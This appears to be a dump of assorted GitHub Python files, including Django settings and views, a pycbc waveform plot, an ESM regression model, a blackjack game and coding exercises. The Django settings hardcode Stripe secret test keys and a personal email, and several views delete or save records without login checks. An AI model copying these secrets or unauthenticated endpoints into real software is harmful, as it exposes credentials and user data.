authorname)","repo_name":"relder251/LazyLibrarianRefresh","sub_path":"lazylibrarian/importer.py","file_name":"importer.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"19501775019","text":"\"\"\"\nShow how to create a time-domain signal.\n\"\"\"\n\nfrom matplotlib import pyplot as plt\nfrom pycbc.waveform import ringdown_td_approximants\n\n\nparams = dict(\n lmns=\"221\",\n tau_220=0.5,\n f_220=1234.0,\n amp220=1e-21,\n phi220=0.3,\n inclination=0.2,\n polarization=1.1,\n t_final=2.0,\n)\n\n# plot waveform\nhp, hc = ringdown_td_approximants[\"TdQNMfromFreqTau\"](\n f_lower=20,\n delta_t=1.0/2048,\n **params,\n)\n\n\nplt.figure()\nplt.title('A Simulated Ring-down Signal Waveform')\nplt.plot(hp.sample_times, hp,color='lightskyblue',linewidth=0.1)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Amplitude\")\nplt.show()\nplt.savefig('InjectedSignalParams.png')\n\nplt.figure()\n\n# plot frequency domain\nhf = hp.to_frequencyseries()\nplt.semilogx(hf.sample_frequencies, hf.real(),color='lightskyblue')\nplt.xlabel('Frequency (Hz)')\nplt.ylabel('Amplitude')\nplt.title('Injected Signal Frequency compared to \\nthe range of Sample Frequencies')\nplt.show()\nplt.savefig('InjectedSignal.png')\n","repo_name":"georgia-github/mastersproject","sub_path":"scripts/test_waveform.py","file_name":"test_waveform.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25890656790","text":"from base import *\n\nDEBUG = True\n\nINSTALLED_APPS.append('debug_toolbar')\n\nMIDDLEWARE.append(\"debug_toolbar.middleware.DebugToolbarMiddleware\")\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Stripe environment variables\nSTRIPE_PUBLISHABLE = os.getenv('STRIPE_PUBLISHABLE', 'pk_test_FGFeav0Qyh7EWFOE5tjhvUXG')\nSTRIPE_SECRET = os.getenv('STRIPE_SECRET', 'sk_test_eNJCMyNYFWAKhYekmVjdAI2E')\n\n# Paypal environment variables\nSITE_URL = 'http://127.0.0.1:8000'\nPAYPAL_NOTIFY_URL = 'http://b82e1155.ngrok.io/a-very-hard-to-guess-url/'\nPAYPAL_RECEIVER_EMAIL = 'renandias@yahoo.com.br'","repo_name":"RenanZabeu/renan_auth","sub_path":"settings/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"253369688","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSolution for day03 2022\n\"\"\"\n\n__author__ = 'Guido Minieri'\n__license__ = 'GPL'\n\n\nimport helper.advent as aoc\nfrom string import ascii_lowercase as lower, ascii_uppercase as upper\n\ndata = aoc.read_input()\n\nscore = ' ' + lower + upper\n\ndef find_error(rucksack):\n l = int(len(rucksack) / 2)\n left, right = rucksack[:l], rucksack[l:]\n return set(left).intersection(set(right))\n\ndef find_badge(group):\n one, two, three = group\n return set(one).intersection(set(two).intersection(set(three)))\n\n# pt 1\nprint(sum(score.find(''.join(find_error(x))) for x in data))\n\n# pt 2\ngroups = [data[x:x+3] for x in range(0, len(data), 3)]\nprint(sum(score.find(''.join(find_badge(x))) for x in groups))\n","repo_name":"gmnr/advent-of-code","sub_path":"2022/03/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22873181608","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.views.generic import View\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib import messages\n\nfrom .models import IgPage, SavePost, Tags\nfrom .forms import PostForm, PageForm, TagForm\n\nimport utils\n\n\ndef index(request):\n\t\n\treturn render(request, 'index.html', {})\n\n\nclass GetPostImg(LoginRequiredMixin, View):\n\n\tdef get(self, request):\n\n\t\tuserid = request.user.pk\n\n\t\tform = PostForm()\n\t\tsavedposts = SavePost.objects.filter(user=userid).order_by('-id')[:5]\n\n\t\tcontext = {\n\t\t\t'form': form,\n\t\t\t'page': \"None\",\n\t\t\t'post': \"None\",\n\t\t\t'recent': savedposts\n\t\t}\n\n\t\treturn render(request, 'post.html', context)\n\n\tdef post(self, request):\n\n\t\tuserid = request.user.pk\n\t\t\n\t\tform = PostForm(request.POST)\n\t\tresponse = None\n\n\t\tif form.is_valid():\n\n\t\t\tresponse = form.cleaned_data['post']\n\n\t\t\t# imgscript = utils.get_post_script(response, 4)\n\t\t\t# imgurl = utils.get_post_src(imgscript) \n\t\t\timgurl = utils.get_post_script(response, 3, \"postscript\")\n\n\t\t\t## temporary commenting this out:\n\t\t\t# pagescript = utils.get_post_script(response, 4)\n\t\t\t# pagename = utils.get_page_from_post(pagescript, 3)\n\t\t\tpagename = utils.get_post_script(response, 2, \"pagescript\")\n\t\t\t# pagename = \"test\"\n\n\t\t\tcontext = {\n\t\t\t\t'form': form,\n\t\t\t\t'page': pagename,\n\t\t\t\t'post': imgurl,\n\t\t\t\t'recent': \"\"\n\t\t\t}\n\n\t\t\treturn render(request, 'post.html', context)\n\n\nclass GetPage(LoginRequiredMixin, View):\n\n\tdef get(self, request):\n\n\t\tform = PageForm(request.GET)\n\t\tuser = request.user\n\t\t\n\t\tif form.is_valid():\n\t\t\t\n\t\t\tpage = form.cleaned_data['page']\n\t\t\turl = utils.get_page_url(page)\n\n\t\t\trequest.session['page'] = page \n\n\t\t\tigpage = IgPage(page=page, url=url, user=user)\n\t\t\tigpage.save()\n\n\t\t\tallpages = IgPage.objects.filter(user=user)\n\n\t\t\tallimgs = utils.get_page_script(url)\n\t\t\t# print allimgs\n\n\t\t\tcontext = {\n\t\t\t\t'form': form,\n\t\t\t\t'page': page,\n\t\t\t\t'pageurl': url,\n\t\t\t\t'posts': allimgs,\n\t\t\t\t'allpages': allpages\n\t\t\t}\n\n\t\t\treturn render(request, 'page.html', context)\n\n\t\telse: \n\t\t\tform = PageForm()\n\t\t\tallpages = IgPage.objects.filter(user=user).order_by('-id')[:5]\n\t\t\tcontext = {\n\t\t\t\t'form': form,\n\t\t\t\t'page': \"None\",\n\t\t\t\t'pageurl': \"\",\n\t\t\t\t'posts': [],\n\t\t\t\t'allpages': allpages,\n\t\t\t}\n\n\t\t\treturn render(request, 'page.html' , context)\n\n\nclass SaveIgPost(View):\n\n\tdef get(self, request, **kwargs):\n\n\t\tuserid = request.user.pk\n\t\tigpage = kwargs.get('page')\n\t\timgurl = kwargs.get('img')\n\t\tpageurl = \"https://www.instagram.com/%s\" % igpage\n\n\t\t# print \"this is the img: %s and this the page: %s\" % (imgurl, igpage)\n\n\t\t# Save to DB:\n\t\tsaveigpost = SavePost(url=pageurl, page=igpage, img=imgurl, user=userid)\n\t\tsaveigpost.save()\n\n\t\tpagecontent = \"Img saved! %s %s\" % (igpage, imgurl)\n\n\t\t# return HttpResponse(pagecontent)\n\n\t\t# redirecturl = '/page/?page=%s' % igpage\n\t\tpreviousurl = request.META['HTTP_REFERER']\n\n\t\tmessages.success(request, ('Post was saved!'))\n\n\t\treturn redirect(previousurl)\n\n\nclass ViewSaved(LoginRequiredMixin, View):\n\n\tdef get(self, request):\n\n\t\tuserid = request.user.pk\n\t\tsavedposts = SavePost.objects.filter(user=userid).order_by('-id')\n\t\ttags = savedposts.values('tag').distinct().exclude(tag=None)\n\n\t\tcontext = {\n\t\t\t'posts': savedposts,\n\t\t\t'tags': tags\n\t\t}\n\n\t\treturn render(request, 'saved_posts.html', context)\n\n\nclass PostDetail(LoginRequiredMixin, View):\n\n\tdef get(self, request, postid):\n\n\t\tuserid = request.user.pk\n\t\tpost = SavePost.objects.get(pk=postid)\n\t\t# tags = Tags.objects.filter(user=userid)\n\n\t\t# utils.tag_dropdown(1)\n\n\t\tnext_post = post.id + 1\n\t\tprevious_post = post.id - 1\n\n\t\tform = TagForm(user=userid)\n\n\t\tcontext = {\n\t\t\t'form': form, \n\t\t\t'post': post,\n\t\t\t'next': next_post,\n\t\t\t'previous': previous_post,\n\t\t\t'tag': post.tag\n\t\t}\n\n\t\tif userid == post.user:\n\t\t\treturn render(request, 'post_detail.html', context)\n\t\telse:\n\t\t\treturn redirect('insta:view_saved')\n\n\tdef post(self, request, postid):\n\n\t\tform = TagForm(user=request.user.id)\n\n\t\tif form.is_valid():\n\t\t\t\n\t\t\ttag = form.cleaned_data['tag']\n\n\t\t\tpost = SavePost.objects.get(pk=postid)\n\t\t\tnext_post = post.id + 1\n\t\t\tprevious_post = post.id - 1\n\n\t\t\tunique_tags = SavePost.objects.filter(tag=tag)\n\n\t\t\tpost.tag = tag\n\t\t\tpost.save()\n\n\t\t\tcontext = {\n\t\t\t\t'form': form,\n\t\t\t\t'post': post,\n\t\t\t\t'next': next_post,\n\t\t\t\t'previous': previous_post,\n\t\t\t\t'tag': post.tag\n\t\t\t}\n\n\t\t\treturn render(request, 'post_detail.html', context)\n\n\nclass DeletePost(View):\n\n\tdef get(self, request, postid):\n\n\t\tpost = SavePost.objects.get(pk=postid)\n\t\tpost.delete()\n\n\t\treturn redirect('/savedposts/')\n\n\nclass ViewSavedTag(View):\n\t## page to see post with a certain tag only\n\tdef get(self, request, tag):\n\t\t\n\t\ttagged_posts = SavePost.objects.filter(tag=tag)\n\t\tall_tags = SavePost.objects.all().values('tag').distinct().exclude(tag=None)\n\n\n\t\tcontext = {\n\t\t\t'posts': tagged_posts,\n\t\t\t'tags': all_tags,\n\t\t}\n\n\t\treturn render(request, 'saved_posts.html', context)\n\n\nclass ManageTags(LoginRequiredMixin, View):\n\n\tdef get(self, request):\n\n\t\tuserid = request.user.id\n\n\t\tall_tags = Tags.objects.filter(user=userid).distinct().exclude(tag=None)\n\t\t# all_tags = SavePost.objects.all().values('tag').distinct().exclude(tag=None)\n\n\t\tform = TagForm(user=userid)\n\n\t\tcontext = {\n\t\t\t'tags': all_tags,\n\t\t\t'form': form,\n\t\t}\n\n\t\treturn render(request, 'manage_tags.html', context)\n\n\tdef post(self, request):\n\n\t\tuserid = request.user.id\n\t\tall_tags = Tags.objects.filter(user=userid).distinct().exclude(tag=None)\n\t\t# all_tags = SavePost.objects.all().values('tag').distinct().exclude(tag=None)\n\n\t\tform = TagForm(request.POST)\n\t\tuserid = request.user.pk\n\t\t# tag_name = form.cleaned_data['tag_name']\n\n\t\tif form.is_valid():\n\t\t\ttag_name = form.cleaned_data['new_tag']\n\t\t\tsave_tag = Tags(tag=tag_name, user=userid)\n\t\t\tsave_tag.save()\n\n\t\t\tcontext = {\n\t\t\t\t'tags': all_tags,\n\t\t\t\t'form': form,\n\t\t\t}\n\n\t\t\treturn render(request, 'manage_tags.html', context)\n\n\nclass EditTag(LoginRequiredMixin, View):\n\n\tdef get(self, request, tag):\n\n\t\tuserid = request.user.id\n\n\t\tall_tags = Tags.objects.filter(user=userid).distinct().exclude(tag=None)\n\t\tcurrent_tag = Tags.objects.filter(pk=tag)\n\n\t\tform = TagForm(user=userid)\n\n\t\tcontext = {\n\t\t\t'tags': all_tags,\n\t\t\t'current_tag': current_tag,\n\t\t\t'form': form,\n\t\t}\n\n\t\treturn render(request, 'edit_tag.html', context)\n\n\tdef post(self, request, tag):\n\n\t\tuserid = request.user.id\n\n\t\tform = TagForm(request.POST)\n\n\t\tif form.is_valid():\n\n\t\t\tall_tags = Tags.objects.filter(user=userid).distinct().exclude(tag=None)\n\t\t\ttag_name = form.cleaned_data['new_tag']\n\t\t\tcurrent_tag = Tags.objects.filter(pk=tag)\n\t\t\tcurrent_tag.update(tag=tag_name)\n\n\t\t\tcontext = {\n\t\t\t\t'tags': all_tags,\n\t\t\t\t'current_tag': current_tag,\n\t\t\t\t'form': form,\n\t\t\t}\n\t\t\ttry:\n\t\t\t\tmessages.success(request, ('Tag was successfully changed'))\n\t\t\t\treturn render(request, 'manage_tags.html', context)\n\t\t\t\n\t\t\texcept:\n\t\t\t\tmessages.success(request, ('Something went wrong...'))\n\t\t\t\treturn render(request, 'edit_tag.html', context)\n\n\nclass DeleteTag(View):\n\n\tdef get(self, request, tag):\n\n\t\ttag = Tags.objects.get(pk=tag)\n\t\ttag.delete()\n\t\tmessages.success(request, ('Tag was successfully deleted'))\n\n\t\treturn redirect('/tags/')\n\n\t\t\n\n\n\n\t# Further development:\n\t# + after entering page, you see the first 10 posts, and you can tag and save to the database\n\t# + after entering post url, you can save the post to database\n\t# + page with all saved post\n\t# + logic to delete post on detail page\n\t# + posts page should have all saved posts with filters by tag\n\t# + post detail page, you can see full size and change tag here\n\t# + manage tag page (create, delete or rename tags)\n\t# + page view: scroll and grid view\n\t# - page view: sort by page\n\t# - rename variables with underscore in naming (correct python naming)\n\t# - add original post url to model/db\n\n\n\t# Bug:\n\t# + Underscores or periods in page names\n\t# + Some posts don't load\n\t# - Previous and next buttons on Saved Post detail page\n\t# - tags with spaces don't work on savedposts page\n\n\n\n","repo_name":"n-ck/insta_app","sub_path":"insta/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71518109287","text":"import torch\nfrom transformers import AutoTokenizer, EsmForSequenceClassification, EsmModel\nfrom torch import nn\nfrom thermostability.hotinfer import CachedModel, RepresentationKeysComb\nfrom thermostability.hotinfer_pregenerated import create_fc_layers\nfrom typing import Literal, Iterator\nimport os\nfrom util.yaml_config import YamlConfig\n\nESMSizes = Literal[\"8M\", \"35M\", \"150M\", \"650M\", \"3B\", \"15B\", \"v1_1B\"]\n\nmodel_names = {\n \"8M\": \"facebook/esm2_t6_8M_UR50D\",\n \"35M\": \"facebook/esm2_t12_35M_UR50D\",\n \"150M\": \"facebook/esm2_t30_150M_UR50D\",\n \"650M\": \"facebook/esm2_t33_650M_UR50D\",\n \"3B\": \"facebook/esm2_t36_3B_UR50D\",\n \"15B\": \"facebook/esm2_t48_15B_UR50D\",\n \"v1_1B\": \"facebook/esm1b_t33_650M_UR50S\",\n}\n\nrequired_config_attributes = [\n \"hugg_esm_freeze\",\n \"hugg_esm_size\",\n]\n\nembedding_dims = {\n \"8M\": 320,\n \"35M\": 480,\n \"150M\": 640,\n \"650M\": 1280,\n \"3B\": 2560,\n \"15B\": 5120,\n \"v1_1B\": 1280,\n}\n\n\nclass ESMAttention1dMean(nn.Module):\n \"\"\"Regression head from FLIP: Attention1d removed, leaving a basic linear model\"\"\"\n\n def __init__(self, d_embedding): # [batch x embedding (1280)] --> [batch x 1]\n super(ESMAttention1dMean, self).__init__()\n self.linear = nn.Linear(d_embedding, d_embedding)\n self.relu = nn.ReLU()\n self.final = nn.Linear(d_embedding, 1)\n\n def forward(self, x):\n x = self.relu(self.linear(x))\n x = self.final(x)\n return x\n\n\nclass ESMForThermostability(CachedModel):\n def __init__(\n self,\n freeze_esm: bool = False,\n model_size: ESMSizes = \"8M\",\n pooling: Literal[\"bos_token\", \"mean\", \"mean_FLIP\"] = \"bos_token\",\n cache_dir: str = None,\n ):\n super().__init__(\n f\"{pooling}_{model_size}\",\n caching=freeze_esm,\n enable_grad=not freeze_esm,\n cache_dir=cache_dir,\n )\n assert (\n model_size in model_names\n ), f\"Invalid ESM2 model size (--hugg_esm_size): {model_size}. Must be in {model_names.keys()} \"\n\n self.model_size = model_size\n self.tokenizer = AutoTokenizer.from_pretrained(\n model_names[model_size], cache_dir=cache_dir\n )\n self.regression = ESMAttention1dMean(embedding_dims[model_size])\n\n self.freeze_esm = freeze_esm\n self.esm = (\n None if freeze_esm else self._get_esm()\n ) # make sure esm is included in learnable params if unfreezed\n self.pooling = pooling\n self.cache_dir = cache_dir\n\n def _get_esm(self):\n if self.esm is None:\n self.esm = EsmModel.from_pretrained(\n model_names[self.model_size], cache_dir=self.cache_dir\n ).to(\"cuda:0\")\n return self.esm\n\n def forward(self, sequences: \"list[str]\"):\n batch_pooled_embeddings = self.get_cached_or_compute(sequences)\n return self.regression(batch_pooled_embeddings)\n\n def compute_representations(self, seqs: \"list[str]\", _: RepresentationKeysComb):\n assert (\n torch.is_grad_enabled() == self._enable_grad\n ), f\"Grad enabled state does not match for esm bos token embeddings computation (required: {self._enable_grad}, actual: {torch.is_grad_enabled()})\"\n esm = self._get_esm()\n input_ids = self.tokenizer(\n seqs, padding=True, truncation=True, return_tensors=\"pt\"\n ).input_ids.to(\"cuda:0\")\n\n outputs = esm(input_ids)\n last_hidden_state = outputs.last_hidden_state\n\n s_embedding = (\n last_hidden_state[:, 0, :]\n if self.pooling == \"bos_token\"\n else torch.mean( # mean over sequence for each token embedding except bos token\n last_hidden_state[\n :,\n 1:,\n ],\n dim=1,\n )\n )\n return s_embedding\n\n def get_learnable_parameters(self) -> Iterator[nn.Parameter]:\n return (\n self.parameters() if not self.freeze_esm else self.regression.parameters()\n )\n\n @classmethod\n def from_config(cls, config, yaml_config: YamlConfig):\n for attr in required_config_attributes:\n assert (\n attr in config\n ), f\"Missing required attribute {attr} in config for ESMForThermostability\"\n\n return ESMForThermostability(\n freeze_esm=config[\"hugg_esm_freeze\"],\n model_size=config[\"hugg_esm_size\"],\n pooling=config[\"hugg_esm_pooling\"],\n cache_dir=yaml_config[\"HuggESMCacheDir\"],\n ).cuda()\n","repo_name":"LeonHermann322/hot-prot","sub_path":"thermostability/huggingface_esm.py","file_name":"huggingface_esm.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12694073623","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Licensed under the GNU General Public License, version 3.\n# See the file http://www.gnu.org/licenses/gpl.txt\n\nfrom inary.actionsapi import get\nfrom inary.actionsapi import autotools\nfrom inary.actionsapi import inarytools\nfrom inary.actionsapi import shelltools\n\n\ndef setup():\n options = \"--disable-gtk-doc-html \\\n --disable-gtk-doc \\\n --enable-introspection \\\n \"\n \n if get.buildTYPE() == \"_emul32\":\n options += \" --libdir=/usr/lib32 \\\n --bindir=/usr/_emul32/bin \\\n --sbindir=/usr/_emul32/sbin \\\n \"\n shelltools.export(\"CC\", \"%s -m32\" % get.CC())\n shelltools.export(\"CXX\", \"%s -m32\" % get.CXX())\n shelltools.export(\"PKG_CONFIG_PATH\", \"/usr/lib32/pkgconfig\")\n\n autotools.configure(options)\n\ndef build():\n autotools.make()\n\ndef install():\n autotools.rawInstall(\"DESTDIR=%s\" % get.installDIR())\n \n if get.buildTYPE() == \"_emul32\":\n inarytools.removeDir(\"/usr/_emul32\")\n\n","repo_name":"Zaryob/SulinRepository","sub_path":"programming/misc/json-glib/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"22854316706","text":"# Python script to unzip the data \nfrom zipfile import ZipFile\n\n# uncompress the zip file \ndef uncompress_file(zip):\n with ZipFile(zip) as zipf:\n zipf.extractall('/opt/udacity_training_data')\n\n# Uncompress the \nuncompress_file('data.zip')","repo_name":"sreenivr/SCND_Behavioral_Cloning","sub_path":"prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70245917289","text":"def is_palindrome(input: str) -> bool:\n \"\"\"\n Checks whether the input string is a valid palindrome\n A palindrome is a string that can be read from the back and from\n the front with similar spelling\n \"\"\"\n\n left = 0\n right = len(input) - 1\n while left <= right:\n if input[left] != input[right]:\n return False\n break\n left += 1\n right -= 1\n return True\n","repo_name":"codemuseKE/ace-technical-interview","sub_path":"src/data-structures/linear/strings/py/palindrome/valid_palindrome.py","file_name":"valid_palindrome.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"53"} +{"seq_id":"13969090624","text":"\"\"\"\ntgrtetyr\n\"\"\"\nfrom typing import List\n\n\ndef find_missing_num(num_array:List[int], n:int):\n if not num_array:\n return None\n n_xor = 0\n for i in range(1, n+1):\n n_xor ^= i\n\n for num in num_array:\n n_xor ^= num\n\n return n_xor\n\n\"\"\"\na list contains all numbers twice except one, find the unique num\n\"\"\"\ndef find_non_duplicate_number(num_array:List[int]):\n result = 0\n\n for num in num_array:\n result ^= num\n\n return result\n\nif __name__ == \"__main__\":\n print(find_missing_num([1,3,5,4,6], 6))\n print(find_non_duplicate_number([2,2,3,4,3,5,6,5,6]))","repo_name":"alisha017/Computer-Science-Fundamentals","sub_path":"InterviewCamp/Bit_Manipulation/duplicate_xor.py","file_name":"duplicate_xor.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25244502653","text":"import random\n# global variable that will be used\n\npossible_suits = ('H','D','C','S')\npossible_ranking = ('A','2','3','4','5','6','7','8','9','10','J','Q','K')\ncard_values = {'A':1, '2':2, '3':3, '4':4, '5':5, '6':6, '7':7, '8':8, '9':9, '10':10, 'J':10, 'Q':10, 'K':10}\nis_playing = False\nchip_pool = 100\nbet = 0\nrestart_phrase = \"Press 'd' to deal the cards again, or press 'q' to quit\"\nphrase = ''\n\nclass Card(object):\n def __init__(self,suit,rank):\n self.suit = suit\n self.rank = rank\n def __str__(self):\n return self.suit + self.rank\n def draw(self):\n print( self.suit , self.rank)\n def getSuit(self):\n return self.suit\n def getRank(self):\n return self.rank\n\nclass Hand(object):\n def __init__(self):\n self.cards = []\n self.value =0\n self.has_ace = False\n def __str__(self):\n all_cards_in_hand = ''\n for card in self.cards:\n card_name = card.__str__()\n all_cards_in_hand += \" \" + card_name\n return 'the hand has %s' % (all_cards_in_hand)\n def add_card(self,card):\n self.cards.append(card)\n if card.rank == 'A' and self.value < 12:\n self.value += 10\n else:\n self.value += card_values[card.rank]\n def draw(self, hidden):\n if hidden == True and is_playing == True :\n starting_card = 1\n else:\n starting_card = 0\n for x in range(starting_card, len(self.cards)):\n self.cards[x].draw()\n def getValue(self):\n return self.value\n\nclass Deck(object):\n def __init__(self):\n self.deck = []\n # initialize the deck\n for suit in possible_suits:\n for rank in possible_ranking:\n self.deck.append(Card(suit,rank))\n def shuffle_deck(self):\n random.shuffle(self.deck)\n def deal(self):\n return self.deck.pop()\n def __str__(self):\n composition = ''\n for card in self.deck:\n composition += card.__str__ + ' '\n return composition\n\ndef make_a_bet():\n\n global bet\n\n print(' What amount of chips would you like to bet? (Enter whole integer please): ')\n while True:\n try:\n bet_comp = int(input()) # Use bet_comp as a checker\n # Check to make sure the bet is within the remaining amount of chips left.\n if bet_comp >= 1 and bet_comp <= chip_pool:\n bet = bet_comp\n break\n else:\n print(\"Invalid bet, you only have \" + str(chip_pool) + \" remaining\")\n continue\n except :\n print('please enter a valid number.Try again ')\n continue\n\n\n# 4 choices, hit, stand, quit, deal\n# 1 method for each\n\ndef deal():\n global bet, chip_pool,is_playing,dealer_hand,player_hand, phrase, deck\n\n # Create a deck\n deck = Deck()\n\n # Shuffle the deck\n deck.shuffle_deck()\n\n # Set up bet\n make_a_bet()\n\n # initialize both a playe hand and a dealer hand\n player_hand = Hand()\n dealer_hand = Hand()\n\n # Deal out 2 cards each\n player_hand.add_card(deck.deal())\n player_hand.add_card(deck.deal())\n\n dealer_hand.add_card(deck.deal())\n dealer_hand.add_card(deck.deal())\n\n phrase = \"Hit or Stand? Press either h or s: \"\n if (is_playing == True): # if the player is indeed playing at the moment\n print('Fold, Sorry')\n chip_pool -= bet\n # Set up to know currently playing hand\n is_playing = True\n game()\n\ndef game():\n print()\n print('Player Hand is: '),\n player_hand.draw(hidden=False)\n print('---------------------------------------')\n print('Player hand total is: ' + str(player_hand.getValue()))\n print('---------------------------------------')\n # Display Dealer Hand\n print('Dealer Hand is: '),\n dealer_hand.draw(hidden=True)\n\n # If game round is over\n if is_playing == False:\n print(\" --- for a total of \" + str(dealer_hand.getValue()))\n print(\"Chip Total: \" + str(chip_pool))\n # Otherwise, don't know the second card yet\n else:\n print(\" with another card hidden upside down\")\n print('---------------------------------------')\n print(phrase)\n player_input()\n\n\ndef hit():\n ''' Implement the hit button '''\n global is_playing, chip_pool, deck, player_hand, dealer_hand, phrase, bet\n\n # If hand is in play add card\n if is_playing:\n if player_hand.getValue() <= 21:\n player_hand.add_card(deck.deal())\n print('---------------------------------------')\n print(\"Player hand is %s \\n\" % player_hand)\n\n if player_hand.getValue() > 21:\n phrase = 'Busted! ' + restart_phrase\n\n chip_pool -= bet\n is_playing = False\n\n else:\n phrase = \"Sorry, can't hit\" + restart_phrase\n\n game()\n\n\ndef stand():\n global is_playing, chip_pool, deck, player_hand, dealer_hand, phrase, bet\n ''' This function will now play the dealers hand, since stand was chosen '''\n\n if is_playing == False:\n if player_hand.getValue() > 0:\n phrase = \"Sorry, you can't stand!\"\n\n # Now go through all the other possible options\n else:\n\n # Soft 17 rule\n while dealer_hand.getValue() < 17:\n dealer_hand.add_card(deck.deal())\n\n # Dealer Busts\n if dealer_hand.getValue() > 21:\n phrase = 'Dealer busts! You win!' + restart_phrase\n chip_pool += bet\n is_playing = False\n\n # Player has better hand than dealer\n elif dealer_hand.getValue() < player_hand.getValue():\n phrase = 'You beat the dealer, you win!' + restart_phrase\n chip_pool += bet\n is_playing = False\n\n # Push\n elif dealer_hand.getValue() == player_hand.getValue():\n phrase = 'Tied up, push!' + restart_phrase\n is_playing = False\n\n # Dealer beats player\n else:\n phrase = 'Dealer Wins!' + restart_phrase\n chip_pool -= bet\n is_playing = False\n game()\n\ndef player_input():\n ''' Read user input, lower case it just to be safe'''\n plin = input().lower()\n\n if plin == 'h':\n hit()\n elif plin == 's':\n stand()\n elif plin == 'd':\n deal()\n elif plin == 'q':\n game_exit()\n else:\n print(\"Invalid Input...Enter h, s, d, or q: \")\n player_input()\n\n\ndef game_exit():\n print('the program is now going to exit, thank you for playing!')\n exit(0)\ndeck = Deck()\ndealer_hand = Hand()\nplayer_hand = Hand()\n#start the game\ndeal()","repo_name":"tarekait1996/python","sub_path":"BlackJackGame.py","file_name":"BlackJackGame.py","file_ext":"py","file_size_in_byte":6597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9533086938","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 4 09:03:58 2016\n\n@author: Kozmik\n\"\"\"\n\nfrom TagsCheckboxModule import TagsCheckboxModule\nfrom tkinter import *\nimport tkinter.messagebox as messagebox\nimport tkinter.simpledialog as simpledialog\nfrom math import ceil\nimport pdb\n\nclass TagsCanvas(Canvas, TagsCheckboxModule):\n def __init__(self, master=None, entry=None, journal=None, **kwargs):\n h = 1\n w = 0\n self.tagslist = {}\n self.dialog = None\n Canvas.__init__(self, master=master, height=h, width=w, highlightthickness=0)\n TagsCheckboxModule.__init__(self, entry=entry, journal=journal)\n \n def clear(self):\n for tag in self.tagslist:\n self.tagslist[tag].destroy()\n self.tagslist = {}\n self.deselectAllBoxes()\n \n def updateCanvas(self, entry):\n self.clear()\n self.updateModule(self, entry)\n \n def addTag(self, tag):\n TagsCheckboxModule.addTag(self, tag)\n if tag not in self.tagslist:\n self.tagslist[tag] = TagButton(self, tag, self)\n# self.tagslist[tag].pack(side=LEFT, padx=1)\n self.sortTags()\n \n def deleteTag(self, tag):\n TagsCheckboxModule.deleteTag(self, tag)\n if tag in self.tagslist:\n self.tagslist[tag].destroy()\n del self.tagslist[tag]\n self.sortTags()\n \n def sortTags(self):\n self.delete('all')\n col = 10\n row = ceil(len(self.tagslist) / col)\n grid = []\n grid = [(x,y) for y in range(0, row) for x in range(0, col)]\n index = 0\n for tag in sorted(self.tagslist):\n self.tagslist[tag].makeInvisible()\n for tag in sorted(self.tagslist):\n x, y = grid[index]\n self.tagslist[tag].grid(column=x, row=y, sticky=EW)\n index += 1#.pack(side=LEFT, padx=1)\n \n def getTags(self):\n return sorted(self.tagslist.keys())\n \n def addDialog(self):\n tags = simpledialog.askstring(title='Add Tags', prompt='Enter at least one tag, separating multiple tags with a comma:')\n if tags:\n tags = tags.split(',')\n for tag in tags:\n if tag.strip():\n self.addTag(tag.strip())\n \n def selectDialog(self):\n self.dialog = Toplevel()\n self.dialog.title('Select Tags')\n canvas = self.getCheckboxCanvas(self.dialog)\n canvas.pack()\n self.dialog.protocol(\"WM_DELETE_WINDOW\", self.propogateTags)\n \n def propogateTags(self):\n selected_tags = self.getStates()\n for tag in selected_tags:\n if selected_tags[tag]:\n self.addTag(tag)\n elif not selected_tags[tag]:\n self.deleteTag(tag)\n self.sortTags()\n self.dialog.destroy()\n self.dialog = None\n \n def save(self):\n tags = self.entry.getTags()\n while not tags:\n tags = self.entry.getTags()\n self.addDialog()\n \nclass TagButton(Button):\n def __init__(self, master=None, text=None, controller=None):\n root = None\n self.master = master\n self.controller = controller\n if not self.master:\n root = Tk()\n self.master = TagsCanvas(root)\n Button.__init__(self, master=self.master, text=text, command=self.changeTagDialog)\n self.tag = text\n self.dialog = None\n self.entry_box = None\n if root:\n self.pack(side=LEFT)\n self.master.pack()\n root.mainloop()\n \n def changeTagDialog(self):\n self.dialog = Toplevel()\n self.dialog.grab_set()\n self.dialog.title('Change Tag')\n message = Message(self.dialog, 